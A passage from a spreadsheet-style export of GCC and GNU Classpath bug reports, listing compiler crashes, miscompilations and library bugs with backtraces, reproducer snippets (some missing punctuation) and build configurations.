Configured with: ../gcc-3.4/gcc/configure --enable-languages=c++ --enable-shared --with-cpu=athlon --enable-version-specific-runtime-libs --with-gxx-include-dir=/usr/local/include/c++/3.4
How-To-Repeat:
just compile it</t>
  </si>
  <si>
    <t>GCC-61573</t>
  </si>
  <si>
    <t>[4.10 Regression] ICE: Segmentation fault building Linux kernel</t>
  </si>
  <si>
    <t>Hello
While building Linux using recent GCC trunk I've got ICE:
  CC      kernel/locking/spinlock.o
kernel/locking/spinlock.c: In function â€˜_raw_read_unlock_bhâ€™:
kernel/locking/spinlock.c:280:1: internal compiler error: Segmentation fault
 }
 ^
0x8b5e25 crash_signal
        /export/users/kyukhin/gcc/git/gcc/gcc/toplev.c:337
0x4eca53 lookup_page_table_entry
        /export/users/kyukhin/gcc/git/gcc/gcc/ggc-page.c:634
0x4eca53 ggc_set_mark(void const*)
        /export/users/kyukhin/gcc/git/gcc/gcc/ggc-page.c:1515
0x711b34 gt_ggc_mx_eh_status(void*)
        /export/users/kyukhin/gcc/build/build-x86_64-linux/gcc/gtype-desc.c:928
0x711cb5 gt_ggc_mx_function(void*)
        /export/users/kyukhin/gcc/build/build-x86_64-linux/gcc/gtype-desc.c:1409
0x410425 gt_ggc_mx_lang_tree_node(void*)
        ./gt-c-c-decl.h:384
0x410270 gt_ggc_mx_lang_tree_node(void*)
        ./gt-c-c-decl.h:516
0x410270 gt_ggc_mx_lang_tree_node(void*)
        ./gt-c-c-decl.h:516
0x70e30a gt_ggc_mx
        /export/users/kyukhin/gcc/git/gcc/gcc/vec.h:1098
0x70e30a gt_ggc_mx_vec_constructor_elt_va_gc_(void*)
        /export/users/kyukhin/gcc/build/build-x86_64-linux/gcc/gtype-desc.c:1326
0x410169 gt_ggc_mx_lang_tree_node(void*)
        ./gt-c-c-decl.h:568
0x40fd76 gt_ggc_mx_lang_tree_node(void*)
        ./gt-c-c-decl.h:284
0x410ccd gt_ggc_mx_c_binding(void*)
        ./gt-c-c-decl.h:104
0x410cf7 gt_ggc_mx_c_binding(void*)
        ./gt-c-c-decl.h:107
0x40f9dd gt_ggc_mx_lang_tree_node(void*)
        ./gt-c-c-decl.h:626
0x40fd3e gt_ggc_mx_lang_tree_node(void*)
        ./gt-c-c-decl.h:280
0x7111f5 gt_ggc_mx_symtab_node(void*)
        /export/users/kyukhin/gcc/build/build-x86_64-linux/gcc/gtype-desc.c:1283
0x4103d0 gt_ggc_mx_lang_tree_node(void*)
        ./gt-c-c-decl.h:379
0x410ccd gt_ggc_mx_c_binding(void*)
        ./gt-c-c-decl.h:104
0x40f9dd gt_ggc_mx_lang_tree_node(void*)
        ./gt-c-c-decl.h:626
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[2]: *** [kernel/locking/spinlock.o] Error 1
make[1]: *** [kernel/locking] Error 2
make: *** [kernel] Error 2
Not reduced reproduction:
- Get Linux (https://www.kernel.org/pub/linux/kernel/v3.x/linux-3.15.tar.xz MD5 97ca1625bb40368dc41b9a7971549071)
- make menuconfig (no changes simply exit)
- make -j1
Revision used:
$ git log -1
commit 03e6428d81ac6978330c5f9cffe0e36aeb754f25
Author: jason 
Date:   Thu Jun 19 09:36:09 2014 +0000
        PR c++/59296
        * call.c (add_function_candidate): Also set LOOKUP_NO_TEMP_BIND.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@211821 138bc75d-0d04-0410-961f-82ee72b054a4</t>
  </si>
  <si>
    <t>GCC-45195</t>
  </si>
  <si>
    <t>incorrect array subscript above bounds warning</t>
  </si>
  <si>
    <t>Using GCC 4.4.1 and the following command test generates an array subscript is above array bounds warning.
gcc -S -Os test.c -Wall
void foo (int b[2][6])
{
  int i = 0
  for (i = 0 i &lt; 6 i++)
    {
      int *pb = 
      *pb  = 0
    }
}
Output from VRP looks like
foo (int[6] * b)
{
  int i
  unsigned int D.1240
  unsigned int i.0
:
  goto 
:
  # i_16 = PHI 
  i.0_6 = (unsigned int) i_16
  D.1240_7 = i.0_6 + 6
  (*b_4(D))[D.1240_7] = 0       &lt;-- warning generated here
  i_10 = i_16 + 1
:
  # i_1 = PHI 
  if (i_1 &lt;= 5)
    goto 
  else
    goto 
:
  return
:
  # i_14 = PHI 
  goto 
}
In the statement (*b_4(D))[D.1240_7] = 0 range of b_4 appears to be [0 5] while the range of index D.1240_7 is [6 11].</t>
  </si>
  <si>
    <t>GCC-35308</t>
  </si>
  <si>
    <t>Straight line strength reduction</t>
  </si>
  <si>
    <t>Seems to be a missing functionality
int a[100]
int g
void foo(int i)
{
     a[i] = i*g
     i++
     a[i] = i*g
     i++
     a[i] = i*g
}
Both array address computation and RHS mpy operations can be strength reduced.</t>
  </si>
  <si>
    <t>GCC-67044</t>
  </si>
  <si>
    <t>ICE: in aggregate_value_p at function.c:2068</t>
  </si>
  <si>
    <t>I see and ICE with the attached code.
$ gfortran -c ice.f90 
ice.f90:44:0:
    allocate( z%f  source=unpck(x)+unpck(y) )
^
internal compiler error: in aggregate_value_p bei function.c:2052
0x819313 aggregate_value_p(tree_node const* tree_node const*)
	gcc/function.c:2052
0x6fa71a expand_call(tree_node* rtx_def* int)
	gcc/calls.c:2578
0x7dc16a expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
	gcc/expr.c:10362
0x7e55c6 store_expr_with_bounds(tree_node* rtx_def* int bool tree_node*)
	gcc/expr.c:5398
0x7e6aec expand_assignment(tree_node* tree_node* bool)
	gcc/expr.c:5170
0x709486 expand_call_stmt
	gcc/cfgexpand.c:2350
0x709486 expand_gimple_stmt_1
	gcc/cfgexpand.c:3239
0x709486 expand_gimple_stmt
	gcc/cfgexpand.c:3400
0x70aa91 expand_gimple_basic_block
	gcc/cfgexpand.c:5412
0x70ef06 execute
	gcc/cfgexpand.c:6023
$ gfortran --version
GNU Fortran (GCC) 6.0.0 20150727 (experimental)
(I see the same problem with versions 5.1.0 and 4.9.2)
module m
 implicit none
 public :: t_base unpck
 private
 type abstract :: t_base
 contains
  private
  generic public :: operator(+) =&gt; add
  procedure(i_add) pass(x) deferred :: add
 end type t_base
 type extends(t_base) :: t_cont
  class(t_base) allocatable :: f
 contains
  procedure pass(x) :: add =&gt; cont_add
 end type t_cont
 abstract interface
  elemental function i_add(xy) result(z)
   import :: t_base t_cont
   implicit none
   class(t_base) intent(in) :: x y
   type(t_cont) :: z
  end function i_add
 end interface
contains
 pure recursive function unpck(x) result(y)
  class(t_base) intent(in) :: x
  class(t_base) allocatable :: y
 end function unpck
 elemental function cont_add(xy) result(z)
  class(t_cont) intent(in) :: x
  class(t_base)  intent(in) :: y
  type(t_cont) :: z
   allocate( z%f  source=unpck(x)+unpck(y) )
 end function cont_add
end module m</t>
  </si>
  <si>
    <t>GCC-81286</t>
  </si>
  <si>
    <t>[6/7 Regression] building for powerpc*-unknown-linux-gnu target fails with RTL checking enabled</t>
  </si>
  <si>
    <t>Hello
there is a new regression on the 6-branch and 7-branch. Trying to build an x86_64-pc-linux-gnu -&gt; powerpc*-unknown-linux-gnu (powerpc-* powerpc64-* powerpc64le-*) crosscompiler with RTL checking enabled fails with:
7-branch r249891:
/repo/gcc-7-branch/libsanitizer/sanitizer_common/sanitizer_coverage_libcdep.cc: In member function 'void __sanitizer::CoverageData::DumpOffsets()':
/repo/gcc-7-branch/libsanitizer/sanitizer_common/sanitizer_coverage_libcdep.cc:814:6: internal compiler error: RTL check: expected code 'reg' have 'subreg' in rhs_regno at rtl.h:1804
 void CoverageData::DumpOffsets() {
      ^~~~~~~~~~~~
0xd60bd7 rtl_check_failed_code1(rtx_def const* rtx_code char const* int char const*)
        /repo/gcc-7-branch/gcc/rtl.c:829
0x5b7e0b rhs_regno
        /repo/gcc-7-branch/gcc/rtl.h:1804
0x12da6bb rhs_regno
        /repo/gcc-7-branch/gcc/config/rs6000/rs6000.md:1660
0x12da6bb gen_addsi3(rtx_def* rtx_def* rtx_def*)
        /repo/gcc-7-branch/gcc/config/rs6000/rs6000.md:1657
0xcb7870 expand_binop_directly
        /repo/gcc-7-branch/gcc/optabs.c:1071
0xcb7de5 expand_binop(machine_mode optab_tag rtx_def* rtx_def* rtx_def* int optab_methods)
        /repo/gcc-7-branch/gcc/optabs.c:1151
0xa69dc9 expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        /repo/gcc-7-branch/gcc/expr.c:9567
0xa53071 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /repo/gcc-7-branch/gcc/expr.c:11102
0xa6207e expand_expr
        /repo/gcc-7-branch/gcc/expr.h:276
0xa6207e expand_operands(tree_node* tree_node* rtx_def* rtx_def** rtx_def** expand_modifier)
        /repo/gcc-7-branch/gcc/expr.c:7672
0xa6b554 expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        /repo/gcc-7-branch/gcc/expr.c:8792
0xa53071 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /repo/gcc-7-branch/gcc/expr.c:11102
0xf38132 expand_expr
        /repo/gcc-7-branch/gcc/expr.h:276
0xf38132 computation_cost
        /repo/gcc-7-branch/gcc/tree-ssa-loop-ivopts.c:3627
0xf44551 get_computation_cost_at
        /repo/gcc-7-branch/gcc/tree-ssa-loop-ivopts.c:5052
0xf4bf3e get_computation_cost
        /repo/gcc-7-branch/gcc/tree-ssa-loop-ivopts.c:5072
0xf4bf3e determine_group_iv_cost_generic
        /repo/gcc-7-branch/gcc/tree-ssa-loop-ivopts.c:5095
0xf4bf3e determine_group_iv_cost
        /repo/gcc-7-branch/gcc/tree-ssa-loop-ivopts.c:5670
0xf4dddd determine_group_iv_costs
        /repo/gcc-7-branch/gcc/tree-ssa-loop-ivopts.c:5815
0xf4dddd tree_ssa_iv_optimize_loop
        /repo/gcc-7-branch/gcc/tree-ssa-loop-ivopts.c:7813
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
6-branch r249890:
/repo/gcc-6-branch/libsanitizer/libbacktrace/../../libbacktrace/dwarf.c: In function 'read_function_entry':
/repo/gcc-6-branch/libsanitizer/libbacktrace/../../libbacktrace/dwarf.c:2343:23: internal compiler error: RTL check: expected code 'reg' have 'subreg' in rhs_regno at rtl.h:1785
        lhdr-&gt;filenames[val.u.uint - 1]
        ~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~
0xb07477 rtl_check_failed_code1(rtx_def const* rtx_code char const* int char const*)
        /repo/gcc-6-branch/gcc/rtl.c:811
0x57d0ca rhs_regno
        /repo/gcc-6-branch/gcc/rtl.h:1785
0xfea5cb rhs_regno
        /repo/gcc-6-branch/gcc/config/rs6000/rs6000.md:1567
0xfea5cb gen_addsi3(rtx_def* rtx_def* rtx_def*)
        /repo/gcc-6-branch/gcc/config/rs6000/rs6000.md:1564
0xa64ce0 expand_binop_directly
        /repo/gcc-6-branch/gcc/optabs.c:1070
0xa65245 expand_binop(machine_mode optab_tag rtx_def* rtx_def* rtx_def* int optab_methods)
        /repo/gcc-6-branch/gcc/optabs.c:1150
mv -f .deps/mmapio.Tpo .deps/mmapio.Plo
0x822edf force_operand(rtx_def* rtx_def*)
        /repo/gcc-6-branch/gcc/expr.c:7194
0x830bd2 expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        /repo/gcc-6-branch/gcc/expr.c:8649
0x818cce expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /repo/gcc-6-branch/gcc/expr.c:9595
0x825198 expand_expr
        /repo/gcc-6-branch/gcc/expr.h:260
0x825198 expand_operands(tree_node* tree_node* rtx_def* rtx_def** rtx_def** expand_modifier)
        /repo/gcc-6-branch/gcc/expr.c:7555
0x82d208 expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        /repo/gcc-6-branch/gcc/expr.c:8404
0x818cce expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /repo/gcc-6-branch/gcc/expr.c:9595
0x816f91 expand_expr
        /repo/gcc-6-branch/gcc/expr.h:260
0x816f91 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /repo/gcc-6-branch/gcc/expr.c:9981
0x8256bf store_expr_with_bounds(tree_node* rtx_def* int bool bool tree_node*)
        /repo/gcc-6-branch/gcc/expr.c:5407
0x8270e0 expand_assignment(tree_node* tree_node* bool)
        /repo/gcc-6-branch/gcc/expr.c:5176
0x6fb6d0 expand_gimple_stmt_1
        /repo/gcc-6-branch/gcc/cfgexpand.c:3618
/bin/sh ../libtool  --tag=CC   --mode=compile /repo/build-6-branch-249890-checking-yes-rtl-df-nographite-powerpc/./gcc/xgcc -B/repo/build-6-branch-249890-checking-yes-rtl-df-nographite-powerpc/./gcc/ -B/repo/gcc-6-branch//binary-6-branch-249890-checking-yes-rtl-df-nographite-powerpc/powerpc-unknown-linux-gnu/bin/ -B/repo/gcc-6-branch//binary-6-branch-249890-checking-yes-rtl-df-nographite-powerpc/powerpc-unknown-linux-gnu/lib/ -isystem /repo/gcc-6-branch//binary-6-branch-249890-checking-yes-rtl-df-nographite-powerpc/powerpc-unknown-linux-gnu/include -isystem /repo/gcc-6-branch//binary-6-branch-249890-checking-yes-rtl-df-nographite-powerpc/powerpc-unknown-linux-gnu/sys-include    -DHAVE_CONFIG_H -I. -I/repo/gcc-6-branch/libsanitizer/libbacktrace -I..  -I /repo/gcc-6-branch/libsanitizer/../include -I /repo/gcc-6-branch/libsanitizer/../libgcc -I ../../libgcc -I .. -I /repo/gcc-6-branch/libsanitizer -I /repo/gcc-6-branch/libsanitizer/../libbacktrace  -W -Wall -Wwrite-strings -Wmissing-format-attribute -Wcast-qual -Werror -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -g -O2 -MT mmap.lo -MD -MP -MF .deps/mmap.Tpo -c -o mmap.lo `test -f '../../libbacktrace/mmap.c' || echo '/repo/gcc-6-branch/libsanitizer/libbacktrace/'`../../libbacktrace/mmap.c
0x6fb6d0 expand_gimple_stmt
        /repo/gcc-6-branch/gcc/cfgexpand.c:3714
0x6fdbfe expand_gimple_basic_block
        /repo/gcc-6-branch/gcc/cfgexpand.c:5720
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Last known working version was:
7-branch r249261
6-branch r249257
The compiler is configured as:
$ powerpc-unknown-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-7-branch/binary-latest-powerpc/bin/powerpc-unknown-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-7-branch/binary-7-branch-249261-checking-yes-rtl-df-extra-nographite-powerpc/bin/../libexec/gcc/powerpc-unknown-linux-gnu/7.1.1/lto-wrapper
Target: powerpc-unknown-linux-gnu
Configured with: /repo/gcc-7-branch//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --without-cloog --without-ppl --without-isl --with-sysroot=/usr/powerpc-unknown-linux-gnu --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=powerpc-unknown-linux-gnu --with-ld=/usr/bin/powerpc-unknown-linux-gnu-ld --with-as=/usr/bin/powerpc-unknown-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-7-branch//binary-7-branch-249261-checking-yes-rtl-df-extra-nographite-powerpc
Thread model: posix
gcc version 7.1.1 20170616 (GCC)</t>
  </si>
  <si>
    <t>GCC-71888</t>
  </si>
  <si>
    <t>internal compiler error: in force_type_die at dwarf2out.c:23236</t>
  </si>
  <si>
    <t>The following code snippet causes an internal compiler error in gcc 6.1.0 if built with -g.
namespace std
{
  using ::__builtin_va_list
}
$ g++ -g bug.cpp
bug.cpp:3:11: internal compiler error: in force_type_die at dwarf2out.c:23236
   using ::__builtin_va_list
           ^~~~~~~~~~~~~~~~~
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-71800</t>
  </si>
  <si>
    <t>GCC generates invalid instruction (stxsiwx) with -mcpu=power7</t>
  </si>
  <si>
    <t>Created attachment 38856
reduced testcase
Noticed that GCC was generating a Power8 insn stxsiwx when -mcpu=power7 was specified. First noticed in 177.mesa from cpu2000 but 435.gromacs and 454.calculix from cpu2006 have same issue.
Compile options : -O2 -mcpu=power7</t>
  </si>
  <si>
    <t>GCC-2765</t>
  </si>
  <si>
    <t>File-scope division by zero causes segfault</t>
  </si>
  <si>
    <t>Compile the following line:-
int i = 8/0
I've marked this high since it's a regression from 2.95.2.
I believe it's a C front end bug although the segfault
is caused in gen_emit_rtl which dereferences a null
pointer (cfunc).  We should probably not have proceeded
that far though I don't know the right place.
Possibly
	pedwarn (initializer element is not computable at load time)
in digest_init should also have
        inside_init = error_mark_node
but this is probably covering up the real problem.
Release:
GCC 3.0 (20010506)</t>
  </si>
  <si>
    <t>GCC-63282</t>
  </si>
  <si>
    <t>[4.8/4.9/5 Regression] ICE in redirect_jump_1</t>
  </si>
  <si>
    <t>Created attachment 33502
ice.c:9:1: internal compiler error: in redirect_jump_1 at jump.c:1515
This may be related to Bug #49891 [marked as RESOLVED FIXED].
$ cat ice.c 
#include 
void fn(void) {
  asm volatile goto (nop :: : : a b)
 a:
  exit(0)
 b:
  return
}
int main(void) {
  return 0
}
$ gcc-snapshot.sh --version
gcc (Debian 20140903-1) 5.0.0 20140904 (experimental) [trunk revision 214924]
Copyright (C) 2014 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ gcc-snapshot.sh -O3 ice.c
ice.c: In function 'fn':
ice.c:9:1: internal compiler error: in redirect_jump_1 at jump.c:1515
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccEJa42m.out file please attach this to your bugreport.
gcc-4.7 -O3 gcc-4.8 -O3 and gcc-4.9 -O3 all ICE.
gcc-4.5 -O3 and gcc-4.6 -O3 do NOT ICE.</t>
  </si>
  <si>
    <t>GCC-39223</t>
  </si>
  <si>
    <t>volatile bug on AVR</t>
  </si>
  <si>
    <t>This bug is seen using the avr-gcc that is built using the script that comes with FemtoOS 0.88.
Compile the attached program like this:
  avr-gcc -O -mmcu=atmega128 small.c -S
It can be seen that func_45() unconditionally loads from volatile g_54.  That is wrong since in the C code the load is protected by a test.</t>
  </si>
  <si>
    <t>GCC-4311</t>
  </si>
  <si>
    <t>unrolling loops creates non-ending loop</t>
  </si>
  <si>
    <t>see the source code attached.
a simple 'for' structure goes looping ever and ever
for special values of the upper bound
change the value of 'max' from -5 to -6 for example and the
program will work
Release:
gcc-3.0.1
Environment:
linux mandrake 8 duron 750 MHz
How-To-Repeat:
gcc -O3 -Wall -funroll-all-loops -s comparaison.c -o comparaison</t>
  </si>
  <si>
    <t>guillaume.lemaitre33</t>
  </si>
  <si>
    <t>GCC-23739</t>
  </si>
  <si>
    <t>JNI: IsAssignableFrom reverses arguments</t>
  </si>
  <si>
    <t>libgcj's IsAssignableFrom returns results opposite to those returned by Sun. 
This seems to be a simple mix-up of the meanings of the function's two arguments.</t>
  </si>
  <si>
    <t>GCC-40487</t>
  </si>
  <si>
    <t>Extra zero extensions produced for ARM.</t>
  </si>
  <si>
    <t>A colleague at ARM found this a couple of days back. 
With trunk as of a few days back configured for arm-none-eabi for cortex-a8
typedef unsigned short ushort
typedef unsigned char uchar
ushort foo(uchar data uchar data1 uchar data2)
{
  uchar x = (uchar)(data)
  x ^= (x + 5) 
  x ^= (x &lt;&lt; 2) 
  x ^= (x &lt;&lt; 1) 
  return x
}
foo:
	@ args = 0 pretend = 0 frame = 0
	@ frame_needed = 0 uses_anonymous_args = 0
	@ link register save eliminated.
	add	r3 r0 #5
	eor	r0 r3 r0
	uxtb	r0 r0   //redundant
	eor	r0 r0 r0 lsl #2
	uxtb	r0 r0   // redundant
	eor	r0 r0 r0 lsl #1
	uxtb	r0 r0
	bx	lr</t>
  </si>
  <si>
    <t>GCC-30168</t>
  </si>
  <si>
    <t>[4.1 Regression] C++ constructors can cause invalid gimple to happen with complex typed variables</t>
  </si>
  <si>
    <t>Testcase:
struct aaa
{
      aaa(_Complex float __z) 
      _Complex float _M_value
}
aaa::aaa(_Complex float __z) : _M_value(__z) {}
--------
We must not be setting DECL_COMPLEX_GIMPLE_REG_P correctly.</t>
  </si>
  <si>
    <t>GCC-83315</t>
  </si>
  <si>
    <t>PowerPC xmmintrin.h emulation for _mm_{minmax}_ps not semantically equivalent</t>
  </si>
  <si>
    <t>PowerPC port xmmintrin.h _mm_min_ps invokes Power vec_min instrinsic and _mm_max_ps invokes Power vec_max instrinsic.  vec_min corresponds to the xsminsp instruction and vec_max corresponds to the xsmaxsp instruction.  The Power instructions implement different semantics for NaN than the Intel equivalents.  The Power ISA 3.0 (Power9) xsmincsp and xsmaxcsp instructions correspond to the Intel semantics.</t>
  </si>
  <si>
    <t>GCC-79729</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE in ix86_print_operand at config/i386/i386.c:18231</t>
  </si>
  <si>
    <t>Affects versions down to 4.9.
Reduced from ./gcc.target/sh/pr21255-3.c :
$ cat z1.c
double
f ()
{
  double r
  asm (mov %S1%S0 mov %R1%R0 : =r (r) : i (20))
  return r
}
$ gcc-7-20170226 -c z1.c
z1.c: In function 'f':
z1.c:7:1: internal compiler error: in ix86_print_operand at config/i386/i386.c:18231
 }
 ^
0xf79218 ix86_print_operand(_IO_FILE* rtx_def* int)
        ../../gcc/config/i386/i386.c:18231
0x8e118c output_operand(rtx_def* int)
        ../../gcc/final.c:3891
0x8e1c67 output_asm_insn(char const* rtx_def**)
        ../../gcc/final.c:3788
0x8e3a2d final_scan_insn(rtx_insn* _IO_FILE* int int int*)
        ../../gcc/final.c:2667
0x8e40a2 final(rtx_insn* _IO_FILE* int)
        ../../gcc/final.c:2051
0x8e4859 rest_of_handle_final
        ../../gcc/final.c:4489
0x8e4859 execute
        ../../gcc/final.c:4562</t>
  </si>
  <si>
    <t>GCC-83704</t>
  </si>
  <si>
    <t>pr31243 revisited</t>
  </si>
  <si>
    <t>Revision r256284 makes the request in pr31243 obsolete for 64-bit mode.
On the positive side -fcheck=bounds now works for the test in comment 9.
On the negative side the following test compiles now but its behavior at run time is not the one I expect:
subroutine foo(i)
  integer(kind=8) intent(in) :: i
  character(len=i) :: x
  print * i
  print * len(x kind=8)
end subroutine foo
program main
  character (len=2_8**32_8+4_8) :: ch
  character (len=4) :: a1 a2
  ch = '123456789'
  a1 = ch(1:4)
  ch(2_8**32_8:2_8**32_8+3_8) = 'abcd'
  a2 = ch(2_8**32_8:2_8**32_8+4_8)
  print * 'a1' 'a2'
  print * ' ch(1:2_8**32_8+3_8) '
  print * len(ch kind=8)
  print * len(ch(1:2_8**32_8+3_8) kind=8)
  call foo(2_8**32_8+4_8)
end program main
The output is
 '1234' 'abcd'
 '123'
           4294967300
           4294967299
Illegal instruction
i.e. print * ' ch(1:2_8**32_8+3_8) ' prints only the first three characters of the 'ch' substring and not the entire substring.
In addition if I comment the line
  print * len(x kind=8)
the Illegal instruction is no longer present in the output
 '1234' 'abcd'
 '123'
           4294967300
           4294967299
           4294967300</t>
  </si>
  <si>
    <t>GCC-11816</t>
  </si>
  <si>
    <t>Incorrect debugging information for anonymous structures</t>
  </si>
  <si>
    <t xml:space="preserve">
When I define an anonymous structure inside an anonymous union I cannot refer to the structure fields while debugging with gdb. I think debugging symbols are not generated properly. Might be a gdb bug.
Environment:
System: Linux SuSiTO 2.4.21 #4 lun jul 28 04:12:48 CEST 2003 i686 GNU/Linux
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib --enable-objc-gc i386-linux
How-To-Repeat:
I define some types:
//calc.c
typedef struct expr *exptr
typedef struct expr {
	exprkind kind 
	union{       
		struct {         /* binary operators */
			exptr binleft
			exptr binright
		}
		struct {         /* asignment expression */
			exptr asigleft /* should be a func or identifier */
			exptr asigright
		}
		format_t format /* format directive */
		char *varname   /* variable name */
		double constant 
		struct {         /* function */
			char *functname
			exptr *args /* NULL ended argument array */
		}
	}
} expr_t		
$ make calc
gcc -Wall -g -ggdb -o calc calc.c
$ gdb calc
gdb calc
GNU gdb 5.3.90_2003-06-29-cvs-debian
Copyright 2003 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i386-linux...
(gdb) ptype expr_t
type = struct expr {
    exprkind kind
    union {
        format_t format
        char *varname
        double constant
    }
}
Of course I cannot refer to any member of a expr_t variable different from the ones printed above. 2Âº level anonymous structs are ignored.
$ p expr_tpointer-&gt;binleft
There is no member named binleft</t>
  </si>
  <si>
    <t>alfonso_acosta_mail</t>
  </si>
  <si>
    <t>GCC-4859</t>
  </si>
  <si>
    <t>java.util.Timer class throw IllegalStateException on cancel()</t>
  </si>
  <si>
    <t>Folliwing code come from http://java.sun.com/docs/books/tutorial/essential/threads/timer.html
With a change this call Timer.schedule(TimerTasklonglong)
instead of Timer.schedule(TimerTasklong).
Sun's JVM-1.4b3 works with this code (no exception). 
kaffe-1.0.6 works (no exception).
import java.util.Timer
import java.util.TimerTask
public class Reminder {
    Timer timer
    public Reminder(int seconds){
	timer = new Timer()
	timer.schedule(new RemindTask()seconds*10001000)
    }
    class RemindTask extends TimerTask {
	public void run(){
	    System.out.println(Ohh!)
	    timer.cancel()
	}
    }
    public static void main(String[] args){
	System.out.println(About to schedule task.)
	new Reminder(5)
	System.out.println(Hello world! ...\n)
    }
}
Error: .. try
Release:
libgcj-3.0
Environment:
Debian Gnu/Linux woody gcc-3.0</t>
  </si>
  <si>
    <t>crxop</t>
  </si>
  <si>
    <t>CLASSPATH-22715</t>
  </si>
  <si>
    <t>ZipFile() constructor should verify ZIP file signature</t>
  </si>
  <si>
    <t xml:space="preserve">From: Mark Wielaard
On Tue 2003-12-09 at 20:20 Archie Cobbs wrote:
&gt; The web site still seems to be down so here is a bug report FWIW...
&gt; 
&gt;     public class xx {
&gt;       public static void main(String[] args) throws Exception {
&gt;           ZipFile f = new ZipFile(xx.java)
&gt;       }
&gt;     }
&gt; 
&gt; This program generates a ZipException on JDK but Classpath
&gt; does not try to verify the file at all so doesn't throw any
&gt; exception... even if you then try to read the file's entries.
&gt; 
&gt; Instead what happens is you get null back from ZipFile.entries()
&gt; which is not according to spec. The ZipFile constructor should try
&gt; to do some minimal verification of the files's signature etc.
&gt; I think a simple fix would be to try to read the directory
&gt; (which you are most likely going to have to do later anyway)
&gt; in the constructor(s).
I believe that was what the code did in the past. But some programs open
lots of zip/jar files while starting up and we didn't want to read the
whole zip directory and construct all those ZipEntries during opening
when the entries might not be needed much later (or at all).
A good fix would be to only put the check that the file starts with
LOCSIG (PK_x0000_03_x0000_04) in the constructor but not explicitly try to read
all entries.
************ end of email quote *************
Request verifying the ZipFile signature in the ZipFile
constructor and throwing a ZipException if that fails.
Also ensure that ZipFile.entries() never returns null.
</t>
  </si>
  <si>
    <t>GCC-68946</t>
  </si>
  <si>
    <t>[6 Regression] ICE at -O3 on x86_64-linux-gnu in both 32- and 64-bit modes (in vect_analyze_stmt at tree-vect-stmts.c:8013)</t>
  </si>
  <si>
    <t>The following code crashes the trunk on x86_64-linux-gnu at -O3 in both 32-bit and 64-bit modes. 
$: gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20151216 (experimental) [trunk revision 231674] (GCC) 
$: 
$: gcc-trunk -w -m64 small.c -O3
small.c: In function â€˜fn1â€™:
small.c:4:6: internal compiler error: in vect_analyze_stmt at tree-vect-stmts.c:8013
 void fn1() {
      ^~~
0xd21f9d vect_analyze_stmt(gimple* bool* _slp_tree*)
	../../gcc-trunk/gcc/tree-vect-stmts.c:8013
0xd3bd6a vect_slp_analyze_node_operations
	../../gcc-trunk/gcc/tree-vect-slp.c:2219
0xd3bc53 vect_slp_analyze_node_operations
	../../gcc-trunk/gcc/tree-vect-slp.c:2203
0xd3bc53 vect_slp_analyze_node_operations
	../../gcc-trunk/gcc/tree-vect-slp.c:2203
0xd3bc53 vect_slp_analyze_node_operations
	../../gcc-trunk/gcc/tree-vect-slp.c:2203
0xd3cd74 vect_slp_analyze_operations(vec void*)
	../../gcc-trunk/gcc/tree-vect-slp.c:2251
0xd41f10 vect_slp_analyze_bb_1
	../../gcc-trunk/gcc/tree-vect-slp.c:2525
0xd41f10 vect_slp_bb(basic_block_def*)
	../../gcc-trunk/gcc/tree-vect-slp.c:2612
0xd44335 execute
	../../gcc-trunk/gcc/tree-vectorizer.c:759
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$: 
$: gcc-trunk -w -m32 small.c -O3
small.c: In function â€˜fn1â€™:
small.c:4:6: internal compiler error: in vect_analyze_stmt at tree-vect-stmts.c:8013
 void fn1() {
      ^~~
